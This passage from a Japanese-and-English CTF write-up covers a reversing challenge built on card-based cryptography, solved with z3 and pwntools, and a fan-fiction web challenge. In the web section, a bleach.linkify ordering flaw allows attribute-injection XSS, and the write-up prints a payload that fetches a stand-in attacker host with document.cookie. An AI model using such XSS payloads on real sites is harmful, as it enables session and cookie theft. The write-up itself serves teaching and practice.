    b = vector(Zmod(256), a[i]) * M**-1 * (M+I)**-99999
    flag += bytes(b[::4])
print(flag)

rev

Red and Black (3 solves)

問題

バイナリが配布されます。実行すると 13 文字の入力が求められ、その後 B と R からなる 200 文字の文字列を出力します。

解法

`main` の解析

main をデコンパイルすると次のような処理をしていることがわかります。

./flag.txt から 39 バイト読み込む
標準入力から 13 バイト読み込む
フラグを sub_401a29(0x45bde0, &flag_buf)、入力を sub_401a29(0x45d160, &input_buf) として配列に書き込む
data_4040a0 にある命令テーブルを 4 要素ずつループし、先頭要素を関数ポインタとして残り 3 要素を引数に呼び出す
配列の先頭 100 要素をもとに B/R からなる文字列を出力する

ステップ 3 で呼ばれている sub_401a29 を読みます。内部のループ部分は次のとおりです。

00401a5f            char rax_4 = *(i + arg2)
00401abf            for (int64_t j = 0; j u<= 7; j += 1) {
00401aa3                char** rbx_1 = ((j + (i << 3)) << 4) + arg1
00401aa9                char* rax_9
00401aa9                int64_t rdx_7
00401aa9                rax_9, rdx_7 = sub_4012b4((zx.d(rax_4) s>> j.b).b & 1)
00401aae                *rbx_1 = rax_9
00401ab1                rbx_1[1] = rdx_7
00401abf            }

各バイトの各ビットを取り出して sub_4012b4 に渡し、返ってきた 2 つのポインタをペアで格納しています。sub_4012b4 は以下のようになっています。

004012b4    char* sub_4012b4(char arg1)
004012c7        char* result = sub_40127b(arg1)
004012e2        char* var_10 = sub_40127b(1 - arg1)
004012ef        return result

sub_40127b は malloc(1) して引数の値を書き込むだけです。つまり sub_4012b4(bit) はヒープに 1 バイトを 2 個確保し、それぞれ bit と 1-bit を書き込んだポインタのペアを返します。 sub_401a29 ではこの 2 ポインタを配列の 1 つのスロットにそのまま並べて書き込んでいます。以降この書き込み先の配列を pool と呼びます。 sub_401a29 の引数のアドレス差（0x45d160 - 0x45bde0 = 0x1380 = 312 x 16 byte）から、フラグは pool[0:312] に、入力は pool[312:416] に入ります。

ステップ 5 の出力ループでは pool の先頭 100 組について "BR"[*pool[i][0]] と "BR"[*pool[i][1]] を出力しています。出力を観察すると2文字ごとにBRまたはRBのいずれかの組となっていることから、各ペアがbit と 1-bitの組となっていることは最後まで保たれていそうです。

命令テーブルには 5 種類の関数ポインタが現れます。

`sub_401468` の解析

まずは sub_401468 を詳しく読みます。冒頭で sub_4012b4(0) を呼んで補助ペアを 1 つ生成し、arg1・arg2 のペアと合わせた 6 つのポインタを sub_401206 でシーケンスにまとめます。

00401490        rax_2, rdx = sub_4012b4(0)
004014a1        char* var_48 = rax_2          // aux.left  = ptr(0)
004014a9        int64_t var_40 = rdx          // aux.right = ptr(1)
004014b4        int64_t var_38 = arg1[0]      // a.left
004014c0        int64_t var_30 = arg1[1]      // a.right
004014cb        int64_t var_28 = arg2[0]      // b.left
004014d7        int64_t var_20 = arg2[1]      // b.right
004014e7        int64_t* rax_13 = sub_401206(&var_48, 6)

sub_401206 は長さをインデックス 0 に持つ配列を確保するため、rax_13[1..6] = [aux.L, aux.R, a.L, a.R, b.L, b.R] です。続いて sub_401301（2 要素を swap する関数）と sub_401334 を呼びます。

sub_401334 は次のとおりです。

00401334    uint64_t sub_401334(int64_t* arg1)
00401345        uint64_t result = zx.q(rand()) & 1
0040134a        if (result.d != 0) {
0040134c            int64_t var_10_1 = 0
004013ab            while (true) {
004013ab                result = *arg1 u>> 1
004013b2                if (var_10_1 u>= result)
004013b2                    break
0040139a                sub_401301(&arg1[var_10_1 + 1], &arg1[var_10_1 + (*arg1 u>> 1) + 1])
0040139f                var_10_1 += 1
004013ab            }
0040134a        }

rand() & 1 が 0 なら何もせず、1 なら前半分と後ろ半分を入れ替える操作を行っています。

00401511            sub_401301(&rax_13[4], &rax_13[5])
0040152c            sub_401301(&rax_13[3], &rax_13[4])
00401538            sub_401334(rax_13)
00401553            sub_401301(&rax_13[3], &rax_13[4])
0040156e            sub_401301(&rax_13[4], &rax_13[5])

最後に sub_4012f0(rax_13[5]) で rax_13[5]の値によって出力となる値を選びます。

00401585            if (sub_4012f0(rax_13[5]) == 0) {
004015b4                arg3[0] = rax_13[2]
004015c3                arg3[1] = rax_13[1]
00401585            } else {
00401593                arg3[0] = rax_13[4]
004015a2                arg3[1] = rax_13[3]
00401585            }

sub_401334内のrand() & 1の結果とa,bの値の組み合わせ8通りについて rax_13[1..6] の並びと出力を追うと、それぞれ以下のようになります。

`rand() & 1`	`a`	`b`	`rax_13[1..6]`	`arg3`
0	`[0, 1]`	`[0, 1]`	`[ptr(0), ptr(1), a.L, a.R, b.L, b.R]`	`[1, 0]`
0	`[0, 1]`	`[1, 0]`	`[ptr(0), ptr(1), a.L, a.R, b.L, b.R]`	`[1, 0]`
0	`[1, 0]`	`[0, 1]`	`[ptr(0), ptr(1), a.L, a.R, b.L, b.R]`	`[1, 0]`
0	`[1, 0]`	`[1, 0]`	`[ptr(0), ptr(1), a.L, a.R, b.L, b.R]`	`[0, 1]`
1	`[0, 1]`	`[0, 1]`	`[a.L, a.R, ptr(0), ptr(1), b.R, b.L]`	`[1, 0]`
1	`[0, 1]`	`[1, 0]`	`[a.L, a.R, ptr(0), ptr(1), b.R, b.L]`	`[1, 0]`
1	`[1, 0]`	`[0, 1]`	`[a.L, a.R, ptr(0), ptr(1), b.R, b.L]`	`[1, 0]`
1	`[1, 0]`	`[1, 0]`	`[a.L, a.R, ptr(0), ptr(1), b.R, b.L]`	`[0, 1]`

この表から、sub_401468はrand() & 1の結果に関わらず、aとbのNANDの値を出力していることがわかります。

カードベース暗号について

この実装の背景にあるのはカードベース暗号です。赤・黒 2 色の"カード"を使って秘密計算を行う手法で、各ビットをカードペアとして表現します。

$(\text{Black},\ \text{Red}) = 0, \qquad (\text{Red},\ \text{Black}) = 1$

2 枚のカードを裏向きで並べると、外から見えるのはカードの位置だけです。どちらが赤でどちらが黒かは区別できないため、ペアが表すビット値は秘密に保たれます。今回のプロトコルは random bisection cut を用いており、sub_401468 で確認したように最終出力はカットの有無に依存しません。

残りの演算の解析

`0x4013B7`

arg1 の 2 ポインタを 2 要素列にまとめ、1 回 swap して arg2 に書き出します。

004013f9        int64_t* rax_5 = sub_401206(&var_28, 2)
 
0040141f        sub_401301(&rax_5[1], &rax_5[2])
00401430        arg2[0] = rax_5[1]
0040143f        arg2[1] = rax_5[2]

初期状態 [a.L, a.R] を swap すると [a.R, a.L] になります。arg2 = [ptr(1-a), ptr(a)] なので bit = 1-a、すなわち NOT です。

`0x4015EC`

[a.L, a.R, b.L, b.R] の 4 要素列で swap・ランダムカット・swap を行い、rax_9[1] の値を開封して条件分岐します。

00401673            sub_401301(&rax_9[2], &rax_9[3])
0040167f            sub_401334(rax_9)
0040169a            sub_401301(&rax_9[2], &rax_9[3])
004016b1            if (sub_4012f0(rax_9[1]) != 0)
004016c9                sub_401301(&rax_9[3], &rax_9[4])
004016da            arg3[0] = rax_9[3]
004016e9            arg3[1] = rax_9[4]

結果は次のとおりです。

`rand() & 1`	`rax_9[1..4]`
0	`[a.L, a.R, b.L, b.R]`
1	`[a.R, a.L, b.R, b.L]`

両パターンともに rax_9[1] の値が a と等価になり、if != 0 の条件は「a=1 のとき swap」と同じ効果を持ちます。結果として arg3 は常に $a \oplus b$ になります。

`0x401824`

sub_4012b4(0) を 2 回呼んで補助ペアを 2 つ生成し、[a.L, a.R, ptr(0), ptr(1), ptr(0), ptr(1)] の 6 要素列で 3 回 swap・ランダムカット・3 回 swap を行います。

004018de            sub_401301(&rax_12[2], &rax_12[3])
004018f9            sub_401301(&rax_12[4], &rax_12[5])
00401914            sub_401301(&rax_12[3], &rax_12[4])
00401920            sub_401334(rax_12)
0040193b            sub_401301(&rax_12[3], &rax_12[4])
00401956            sub_401301(&rax_12[4], &rax_12[5])
00401971            sub_401301(&rax_12[2], &rax_12[3])
00401988            if (sub_4012f0(rax_12[1]) != 0) {
004019a0                sub_401301(&rax_12[3], &rax_12[4])
004019bb                sub_401301(&rax_12[5], &rax_12[6])
00401988            }
004019cc            arg2[0] = rax_12[3]
004019db            arg2[1] = rax_12[4]
004019ee            arg3[0] = rax_12[5]
004019ee            arg3[1] = rax_12[6]

rand() & 1の0/1と a=0/1 の 4 通りを追うと、rax_12[1] の開封値に応じた条件 swap によって常に arg2 = arg3 = a になります。すなわち、aの値をarg2,arg3 にコピーする操作です。

`0x401712`

sub_401712 をデコンパイルすると、XOR（sub_4015ec）と同じスワップ・ランダムカット・スワップを行いますが、最後の書き出し先が異なります。xor が第 3 引数 arg3 に書き出すのに対し、

// sub_4015ec (xor) の末尾
004016da            arg3[0] = rax_9[3]
004016e9            arg3[1] = rax_9[4]

entangle は 4 枚すべてを入力の arg1,arg2 に書き戻しています。

// sub_401712 (entangle) の末尾
004017cd            arg1[0] = rax_9[1]
004017dc            arg1[1] = rax_9[2]
004017ec            arg2[0] = rax_9[3]
004017fb            arg2[1] = rax_9[4]

カットが起きなければ 2 ペアとも変化せず、起きると両方がビット反転します。ランダムビット $r$ を用いると

$a \leftarrow a \oplus r, \qquad b \leftarrow b \oplus r$

と等価です。同一のランダムビット $r$ が aとb の両方に XOR されるため、他の演算と異なり出力がrand() & 1の結果に依存します。

z3 によるモデル化

フラグの各ビットとentangleの呼び出しごとの $r$ の値を未知変数とし、バイナリから読み出した prog[] をブール回路として z3 でモデル化します。

entangle は prog[]内で20 回呼びだされていることから、未知の値は全体で $39 \times 8 + 20 = 332$ bitあります。しかし、出力は100bit分の情報量しかないため、適当な入力を与えた結果を用いて解いても、残念ながら解は一意には求まりません。

ところで、バイナリは接続のたびに getrandom で rand を再シードするため、別クエリの entangle 変数は互いに独立です。また、入力もランダムに与えると毎回異なるビット列が出力され、新たな制約が得られます。 20回程度ランダムな入力を与えてクエリを重ね、加えてフラグフォーマット（tkbctf{[\x20-\x7f]}）も制約として追加すると解が一意に定まります。

ソルバーは以下のようになります。

ソルバ（クリックで展開）

import random
import struct
from typing import List, Tuple
from pwn import *
from z3 import *
 
 
FLAG_LEN = 13 * 3
INPUT_LEN = 13
POOL_LEN = (FLAG_LEN + INPUT_LEN) * 8 + 2
 
FN_ADDRS_VA = {
    0x004013B7: "not",
    0x00401468: "nand",
    0x004015EC: "xor",
    0x00401712: "entangle",
    0x00401824: "copy",
}
 
def read_prog(path: str) -> List[Tuple[str, int, int, int]]:
    with open(path, "rb") as f:
        data = f.read()
 
    qword = struct.Struct("<Q")
    pool_base = -1
 
    ops: List[Tuple[str, int, int, int]] = []
    for i in range(0, len(data), 32):
        fnp = qword.unpack_from(data, 0x30a0 + i)[0]
        if fnp not in FN_ADDRS_VA:
            pool_base = i + 0x004040a0 + 0x20
            break
        fn_name = FN_ADDRS_VA[fnp]
        a = qword.unpack_from(data, 0x30a0 + i + 8)[0]
        b = qword.unpack_from(data, 0x30a0 + i + 16)[0]
        c = qword.unpack_from(data, 0x30a0 + i + 24)[0]
        ops.append((fn_name, a, b, c))
 
    normalized: List[Tuple[str, int, int, int]] = []
    for fn, a, b, c in ops:
        ia = (a - pool_base) // 16
        ib = (b - pool_base) // 16
        ic = (c - pool_base) // 16
        normalized.append((fn, ia, ib, ic))
    return normalized
 
 
def run_binary(payload: bytes) -> List[int]:
    sc = remote("localhost", 1337)
    
    sc.recvuntil(b": ")
    sc.sendline(payload)
    raw = sc.recvline().rstrip()
    return [1 if raw[i*2:i*2+2] == b"RB" else 0 for i in range(100)]
 
 
def bits_from_input(data: bytes) -> List[bool]:
    return [bool((b >> i) & 1) for b in data for i in range(8)]
 
 
def eval_ops(
    ops: List[Tuple[str, int, int, int]],
    input_bits: List[bool],
    flag_bits: List,
    entangle_prefix: str,
) -> List:
    pool = [BoolVal(False)] * POOL_LEN
    for i in range(FLAG_LEN * 8):
        pool[i] = flag_bits[i]
    for i in range(INPUT_LEN * 8):
        pool[FLAG_LEN * 8 + i] = BoolVal(input_bits[i])
 
    ent_i = 0
    for fn, a, b, c in ops:
        if fn == "copy":
            pool[b] = pool[a]
            pool[c] = pool[a]
        elif fn == "not":
            pool[b] = Not(pool[a])
        elif fn == "xor":
            pool[c] = Xor(pool[a], pool[b])
        elif fn == "nand":
            pool[c] = Not(And(pool[a], pool[b]))
        elif fn == "entangle":
            r = Bool(f"{entangle_prefix}_x{ent_i}")
            ent_i += 1
            pool[a] = Xor(pool[a], r)
            pool[b] = Xor(pool[b], r)
    return pool
 
 
def solve(runs: int = 20):
    ops = read_prog("./red-and-black")
    flag_bits = [Bool(f"f{i}") for i in range(FLAG_LEN * 8)]
    s = Solver()
 
    prefix = b"tkbctf{"
    for i, ch in enumerate(prefix):
        for b in range(8):
            s.add(flag_bits[i * 8 + b] == BoolVal(bool((ch >> b) & 1)))
    last_idx = FLAG_LEN - 1
    for b in range(8):
        s.add(flag_bits[last_idx * 8 + b] == BoolVal(bool((ord('}') >> b) & 1)))
    for i in range(len(prefix), FLAG_LEN - 1):
        byte = Sum([If(flag_bits[i * 8 + b], 1 << b, 0) for b in range(8)])
        s.add(byte >= 0x20, byte <= 0x7e)
 
    rng = random.Random(1337)
    for r in range(runs):
        payload = bytes(rng.randint(0x20, 0x7f) for _ in range(INPUT_LEN))
        out_bits = run_binary(payload)
        input_bits = bits_from_input(payload)
        pool = eval_ops(ops, input_bits, flag_bits, f"run{r}")
        for i, bit in enumerate(out_bits):
            s.add(pool[i] == BoolVal(bool(bit)))
 
    while s.check() == sat:
        m = s.model()
        out = bytearray()
        block = []
        for i in range(FLAG_LEN):
            v = 0
            for b in range(8):
                bit = flag_bits[i * 8 + b]
                bit_val = m.eval(bit, model_completion=True)
                if is_true(bit_val):
                    v |= (1 << b)
                block.append(bit != bit_val)
            out.append(v)
        print(bytes(out))
        s.add(Or(block))
 
 
if __name__ == "__main__":
    solve()

rev

Red and Black (3 solves)

Challenge

A binary is distributed. Running it asks for 13 characters of input, then outputs a 200-character string consisting of 'B' and 'R'.

Solution

Analyzing `main`

Decompiling main shows it does the following:

Read 39 bytes from ./flag.txt
Read 13 bytes from stdin
Write flag into an array with sub_401a29(0x45bde0, &flag_buf), input with sub_401a29(0x45d160, &input_buf)
Loop through instruction table data_4040a0 in groups of 4 elements, calling the first element as a function pointer with the other 3 as arguments
Output a 'B'/'R' string based on the first 100 elements of the array

Read sub_401a29 called in step 3. The inner loop is:

00401a5f            char rax_4 = *(i + arg2)
00401abf            for (int64_t j = 0; j u<= 7; j += 1) {
00401aa3                char** rbx_1 = ((j + (i << 3)) << 4) + arg1
00401aa9                char* rax_9
00401aa9                int64_t rdx_7
00401aa9                rax_9, rdx_7 = sub_4012b4((zx.d(rax_4) s>> j.b).b & 1)
00401aae                *rbx_1 = rax_9
00401ab1                rbx_1[1] = rdx_7
00401abf            }

Each bit of each byte is extracted and passed to sub_4012b4, and the two returned pointers are stored as a pair. sub_4012b4 is:

004012b4    char* sub_4012b4(char arg1)
004012c7        char* result = sub_40127b(arg1)
004012e2        char* var_10 = sub_40127b(1 - arg1)
004012ef        return result

sub_40127b simply malloc(1)s and writes the argument value. So sub_4012b4(bit) allocates 2 bytes on the heap, writes bit and 1-bit to them, and returns the pair of pointers. sub_401a29 writes these 2 pointers directly into one slot of the array. We call this destination array pool. From the address difference of sub_401a29's arguments (0x45d160 - 0x45bde0 = 0x1380 = 312 x 16 bytes), the flag goes into pool[0:312] and the input into pool[312:416].

The output loop in step 5 outputs "BR"[*pool[i][0]] and "BR"[*pool[i][1]] for the first 100 pairs of pool. Observing the output, each pair of characters is always either BR or RB, confirming that the invariant of bit and 1-bit pairs is maintained throughout.

Five types of function pointers appear in the instruction table.

Analyzing `sub_401468`

Read sub_401468 in detail. At the start, it calls sub_4012b4(0) to generate one auxiliary pair, and combines it with the arg1 and arg2 pairs into 6 pointers organized into a sequence by sub_401206.

00401490        rax_2, rdx = sub_4012b4(0)
004014a1        char* var_48 = rax_2          // aux.left  = ptr(0)
004014a9        int64_t var_40 = rdx          // aux.right = ptr(1)
004014b4        int64_t var_38 = arg1[0]      // a.left
004014c0        int64_t var_30 = arg1[1]      // a.right
004014cb        int64_t var_28 = arg2[0]      // b.left
004014d7        int64_t var_20 = arg2[1]      // b.right
004014e7        int64_t* rax_13 = sub_401206(&var_48, 6)

sub_401206 allocates an array with length at index 0, so slots are rax_13[1..6] = [aux.L, aux.R, a.L, a.R, b.L, b.R]. Then it calls sub_401301 (a function swapping 2 elements) and sub_401334.

sub_401334 is as follows:

00401334    uint64_t sub_401334(int64_t* arg1)
00401345        uint64_t result = zx.q(rand()) & 1
0040134a        if (result.d != 0) {
0040134c            int64_t var_10_1 = 0
004013ab            while (true) {
004013ab                result = *arg1 u>> 1
004013b2                if (var_10_1 u>= result)
004013b2                    break
0040139a                sub_401301(&arg1[var_10_1 + 1], &arg1[var_10_1 + (*arg1 u>> 1) + 1])
0040139f                var_10_1 += 1
004013ab            }
0040134a        }

If rand() & 1 is 0, it does nothing; if 1, it swaps the first half and second half of the array.

00401511            sub_401301(&rax_13[4], &rax_13[5])
0040152c            sub_401301(&rax_13[3], &rax_13[4])
00401538            sub_401334(rax_13)
00401553            sub_401301(&rax_13[3], &rax_13[4])
0040156e            sub_401301(&rax_13[4], &rax_13[5])

Finally, sub_4012f0(rax_13[5]) reveals the value of rax_13[5] and selects the output:

00401585            if (sub_4012f0(rax_13[5]) == 0) {
004015b4                arg3[0] = rax_13[2]
004015c3                arg3[1] = rax_13[1]
00401585            } else {
00401593                arg3[0] = rax_13[4]
004015a2                arg3[1] = rax_13[3]
00401585            }

Tracing all 8 combinations of rand() & 1, a, and b through rax_13[1..6] and the output:

`rand() & 1`	`a`	`b`	`rax_13[1..6]`	`arg3`
0	`[0, 1]`	`[0, 1]`	`[ptr(0), ptr(1), a.L, a.R, b.L, b.R]`	`[1, 0]`
0	`[0, 1]`	`[1, 0]`	`[ptr(0), ptr(1), a.L, a.R, b.L, b.R]`	`[1, 0]`
0	`[1, 0]`	`[0, 1]`	`[ptr(0), ptr(1), a.L, a.R, b.L, b.R]`	`[1, 0]`
0	`[1, 0]`	`[1, 0]`	`[ptr(0), ptr(1), a.L, a.R, b.L, b.R]`	`[0, 1]`
1	`[0, 1]`	`[0, 1]`	`[a.L, a.R, ptr(0), ptr(1), b.R, b.L]`	`[1, 0]`
1	`[0, 1]`	`[1, 0]`	`[a.L, a.R, ptr(0), ptr(1), b.R, b.L]`	`[1, 0]`
1	`[1, 0]`	`[0, 1]`	`[a.L, a.R, ptr(0), ptr(1), b.R, b.L]`	`[1, 0]`
1	`[1, 0]`	`[1, 0]`	`[a.L, a.R, ptr(0), ptr(1), b.R, b.L]`	`[0, 1]`

From this table, it is clear that sub_401468 outputs the NAND of a and b regardless of rand() & 1.

Card-Based Cryptography

The background of this implementation is card-based cryptography, a protocol that performs secure computation using physical cards of two colors (red and black). Each bit is represented as a card pair:

$(\text{Black},\ \text{Red}) = 0, \qquad (\text{Red},\ \text{Black}) = 1$

Two cards placed face-down — their positions are visible from outside, but which is red and which is black cannot be distinguished, so the bit value represented by the pair remains secret. This protocol uses a random bisection cut, and as confirmed in sub_401468, the final output does not depend on the result of the cut.

Analyzing the Remaining Operations

`0x4013B7`

The 2 pointers of arg1 are organized into a 2-element sequence, swapped once, and written to arg2.

004013f9        int64_t* rax_5 = sub_401206(&var_28, 2)
 
0040141f        sub_401301(&rax_5[1], &rax_5[2])
00401430        arg2[0] = rax_5[1]
0040143f        arg2[1] = rax_5[2]

The initial state [a.L, a.R] becomes [a.R, a.L] after the swap. Since arg2 = [ptr(1-a), ptr(a)], bit = 1-a, i.e., NOT.

`0x4015EC`

Performs swap, random cut, swap on a 4-element sequence [a.L, a.R, b.L, b.R], then reveals rax_9[1] and branches.

00401673            sub_401301(&rax_9[2], &rax_9[3])
0040167f            sub_401334(rax_9)
0040169a            sub_401301(&rax_9[2], &rax_9[3])
004016b1            if (sub_4012f0(rax_9[1]) != 0)
004016c9                sub_401301(&rax_9[3], &rax_9[4])
004016da            arg3[0] = rax_9[3]
004016e9            arg3[1] = rax_9[4]

The result is:

`rand() & 1`	`rax_9[1..4]`
0	`[a.L, a.R, b.L, b.R]`
1	`[a.R, a.L, b.R, b.L]`

In both patterns rax_9[1] is equivalent to the value of a, so the if != 0 condition acts as "swap when a=1". The result is that arg3 is always $a \oplus b$ .

`0x401824`

Calls sub_4012b4(0) twice to generate 2 auxiliary pairs, then performs 3 swaps, random cut, 3 swaps on a 6-element sequence [a.L, a.R, ptr(0), ptr(1), ptr(0), ptr(1)].

004018de            sub_401301(&rax_12[2], &rax_12[3])
004018f9            sub_401301(&rax_12[4], &rax_12[5])
00401914            sub_401301(&rax_12[3], &rax_12[4])
00401920            sub_401334(rax_12)
0040193b            sub_401301(&rax_12[3], &rax_12[4])
00401956            sub_401301(&rax_12[4], &rax_12[5])
00401971            sub_401301(&rax_12[2], &rax_12[3])
00401988            if (sub_4012f0(rax_12[1]) != 0) {
004019a0                sub_401301(&rax_12[3], &rax_12[4])
004019bb                sub_401301(&rax_12[5], &rax_12[6])
00401988            }
004019cc            arg2[0] = rax_12[3]
004019db            arg2[1] = rax_12[4]
004019ee            arg3[0] = rax_12[5]
004019ee            arg3[1] = rax_12[6]

Tracing all 4 combinations of rand() & 1 being 0/1 and a=0/1, the conditional swap based on the revealed value of rax_12[1] always produces arg2 = arg3 = a. This is a copy operation that copies a into both arg2 and arg3.

`0x401712`

Decompiling sub_401712 shows it performs the same swap, random cut, swap as XOR (sub_4015ec), but the write destination at the end is different. While xor writes to the third argument arg3:

// sub_4015ec (xor) end
004016da            arg3[0] = rax_9[3]
004016e9            arg3[1] = rax_9[4]

entangle writes all 4 cards back to the input arg1 and arg2:

// sub_401712 (entangle) end
004017cd            arg1[0] = rax_9[1]
004017dc            arg1[1] = rax_9[2]
004017ec            arg2[0] = rax_9[3]
004017fb            arg2[1] = rax_9[4]

If no cut occurs, both pairs are unchanged; if a cut occurs, both are bit-flipped. Using a random bit $r$ :

$a \leftarrow a \oplus r, \qquad b \leftarrow b \oplus r$

Since the same random bit $r$ is XORed to both a and b, unlike other operations, the output depends on rand() & 1.

Modeling with z3

Model prog[] read from the binary as a boolean circuit in z3, with the flag bits and the $r$ value for each entangle call as unknowns.

Since entangle is called 20 times in prog[], the total unknowns are $39 \times 8 + 20 = 332$ bits. However, the output contains only 100 bits of information, so solving with a single query unfortunately does not yield a unique solution.

Since the binary re-seeds rand with getrandom on each connection, entangle variables from different queries are independent. Also, providing random inputs each time produces different output bit strings, yielding new constraints. By making about 20 queries with random inputs and also adding the flag format (tkbctf{[\x20-\x7f]}) as constraints, the solution becomes unique.

The solver is as follows.

Solver (click to expand)

import random
import struct
from typing import List, Tuple
from pwn import *
from z3 import *
 
 
FLAG_LEN = 13 * 3
INPUT_LEN = 13
POOL_LEN = (FLAG_LEN + INPUT_LEN) * 8 + 2
 
FN_ADDRS_VA = {
    0x004013B7: "not",
    0x00401468: "nand",
    0x004015EC: "xor",
    0x00401712: "entangle",
    0x00401824: "copy",
}
 
def read_prog(path: str) -> List[Tuple[str, int, int, int]]:
    with open(path, "rb") as f:
        data = f.read()
 
    qword = struct.Struct("<Q")
    pool_base = -1
 
    ops: List[Tuple[str, int, int, int]] = []
    for i in range(0, len(data), 32):
        fnp = qword.unpack_from(data, 0x30a0 + i)[0]
        if fnp not in FN_ADDRS_VA:
            pool_base = i + 0x004040a0 + 0x20
            break
        fn_name = FN_ADDRS_VA[fnp]
        a = qword.unpack_from(data, 0x30a0 + i + 8)[0]
        b = qword.unpack_from(data, 0x30a0 + i + 16)[0]
        c = qword.unpack_from(data, 0x30a0 + i + 24)[0]
        ops.append((fn_name, a, b, c))
 
    normalized: List[Tuple[str, int, int, int]] = []
    for fn, a, b, c in ops:
        ia = (a - pool_base) // 16
        ib = (b - pool_base) // 16
        ic = (c - pool_base) // 16
        normalized.append((fn, ia, ib, ic))
    return normalized
 
 
def run_binary(payload: bytes) -> List[int]:
    sc = remote("localhost", 1337)
 
    sc.recvuntil(b": ")
    sc.sendline(payload)
    raw = sc.recvline().rstrip()
    return [1 if raw[i*2:i*2+2] == b"RB" else 0 for i in range(100)]
 
 
def bits_from_input(data: bytes) -> List[bool]:
    return [bool((b >> i) & 1) for b in data for i in range(8)]
 
 
def eval_ops(
    ops: List[Tuple[str, int, int, int]],
    input_bits: List[bool],
    flag_bits: List,
    entangle_prefix: str,
) -> List:
    pool = [BoolVal(False)] * POOL_LEN
    for i in range(FLAG_LEN * 8):
        pool[i] = flag_bits[i]
    for i in range(INPUT_LEN * 8):
        pool[FLAG_LEN * 8 + i] = BoolVal(input_bits[i])
 
    ent_i = 0
    for fn, a, b, c in ops:
        if fn == "copy":
            pool[b] = pool[a]
            pool[c] = pool[a]
        elif fn == "not":
            pool[b] = Not(pool[a])
        elif fn == "xor":
            pool[c] = Xor(pool[a], pool[b])
        elif fn == "nand":
            pool[c] = Not(And(pool[a], pool[b]))
        elif fn == "entangle":
            r = Bool(f"{entangle_prefix}_x{ent_i}")
            ent_i += 1
            pool[a] = Xor(pool[a], r)
            pool[b] = Xor(pool[b], r)
    return pool
 
 
def solve(runs: int = 20):
    ops = read_prog("./red-and-black")
    flag_bits = [Bool(f"f{i}") for i in range(FLAG_LEN * 8)]
    s = Solver()
 
    prefix = b"tkbctf{"
    for i, ch in enumerate(prefix):
        for b in range(8):
            s.add(flag_bits[i * 8 + b] == BoolVal(bool((ch >> b) & 1)))
    last_idx = FLAG_LEN - 1
    for b in range(8):
        s.add(flag_bits[last_idx * 8 + b] == BoolVal(bool((ord('}') >> b) & 1)))
    for i in range(len(prefix), FLAG_LEN - 1):
        byte = Sum([If(flag_bits[i * 8 + b], 1 << b, 0) for b in range(8)])
        s.add(byte >= 0x20, byte <= 0x7e)
 
    rng = random.Random(1337)
    for r in range(runs):
        payload = bytes(rng.randint(0x20, 0x7f) for _ in range(INPUT_LEN))
        out_bits = run_binary(payload)
        input_bits = bits_from_input(payload)
        pool = eval_ops(ops, input_bits, flag_bits, f"run{r}")
        for i, bit in enumerate(out_bits):
            s.add(pool[i] == BoolVal(bool(bit)))
 
    while s.check() == sat:
        m = s.model()
        out = bytearray()
        block = []
        for i in range(FLAG_LEN):
            v = 0
            for b in range(8):
                bit = flag_bits[i * 8 + b]
                bit_val = m.eval(bit, model_completion=True)
                if is_true(bit_val):
                    v |= (1 << b)
                block.append(bit != bit_val)
            out.append(v)
        print(bytes(out))
        s.add(Or(block))
 
 
if __name__ == "__main__":
    solve()

web

Dream of You (26 solves)

問題

夢小説の投稿サイトがあり、/submit で投稿した内容を /read/<id> で閲覧できます。本文中の [name] は読者名に置換され、URL は自動的にリンク化されます。/report に投稿 ID を送ると、Reader Bot がそのページを閲覧し、flag をクッキーにセットした状態でページを操作します。

Reader Bot は flag を HttpOnly にしていないため、XSS が成立すれば document.cookie から取り出せます。

解法

[name] の置換が linkify の後で行われている点に注目します。本文は一度サニタイズされた後に bleach.linkify でリンク化され、その後に [name] が単純な文字列置換で埋め込まれます。ここで name は bleach.clean されますが、属性用にエスケープされるわけではないため、" を含めると href を壊して属性を注入できます。

@app.get("/read/<int:story_id>")
def read_story(story_id: int):
    story = next((s for s in STORIES if s["id"] == story_id), None)
    if story is None:
        abort(404)
    name = request.args.get("name") or story["default_name"]
    name = sanitize_text(name.strip())
    content = story["content"].replace("[name]", "[name] ")
    sanitized = sanitize_text(content)
    linkified = linkify_text(sanitized)
    rendered = linkified.replace("[name]", name)
    return render_template(
        "read.html",
        title=escape(story["title"]),
        name=escape(name),
        story=Markup(rendered),
    )

本文に https://example.com/?q=[name] のような文字列を入れておくと、linkify によって <a href="https://example.com/?q=[name]">...</a> が生成されます。ここで [name] が href の中に現れるため、置換後に属性注入が可能になります。

"onfocus=fetch('https://attacker/?'+document.cookie) autofocus= のような値をdefault_nameに入れることができれば<a href="https://example.com/?q="onfocus=fetch('https://attacker/?'+document.cookie) autofocus=">...</a>となり、href を壊して onfocus と autofocus が注入されます。これでページ読み込み時に自動で fetch が実行され、Cookie が攻撃者に送信されます。しかし、default_name は 20 文字制限があるため、直接ペイロードを入れることはできません。

さらに、[name] の後に空白が挿入されるため、URL の中盤に [name] を置いて後ろの文字列も使いながら属性注入することもできません。

一方、/read/<id>?name=... の name パラメータには長さ制限がありません。よって、

そこで、まず default_name に入る長さのinjectionで、ボットが名前を入力する際のクリックをジャッキングします。例えば "style=padding:9%; とすると、urlのクリック判定が広がり、ボットがinput[name='name']をクリックした際に任意のURLに遷移させることができます。

このリンク先を /read/<id>?name=<payload> にしておけば、ボットを任意 name を持ったページに遷移させることができます。ここで name に "onfocus=fetch('https://attacker/?'+document.cookie) autofocus= のような文字列を入れておくと、href から抜けて onfocus と autofocus が注入され、ページ読み込み時に自動で fetch が実行されます。

/readにアクセスさせるためにはhttp://dream-of-you:5000をURLとして指定する必要がありますが、これはlinkifyにはURLとして認識されないため、https://redirectmeto.com/http://dream-of-you:5000のようにしてリダイレクトを噛ませる必要があります。

これで Reader Bot の flag クッキーが取得できます。

" 'x='を使う方法や、[name<img/>]を使う方法などいくつか非想定解が存在しました。Web問題は非想定を潰すのが難しいことを思い知りました……

web

Dream of You (26 solves)

Challenge

There is a fan fiction submission site where you can submit content at /submit and view it at /read/<id>. Occurrences of [name] in the body are replaced with the reader's name, and URLs are automatically linkified. Sending a post ID to /report causes the Reader Bot to view that page, with the flag set as a cookie.

The Reader Bot does not set flag as HttpOnly, so if XSS can be achieved, the cookie can be extracted from document.cookie.

Solution

Note that the [name] replacement happens after linkification. The body is first sanitized, then linkified with bleach.linkify, and then [name] is embedded by a simple string replacement. The name is bleach.clean-ed, but it is not attribute-escaped, so including " breaks the href and allows attribute injection.

@app.get("/read/<int:story_id>")
def read_story(story_id: int):
    story = next((s for s in STORIES if s["id"] == story_id), None)
    if story is None:
        abort(404)
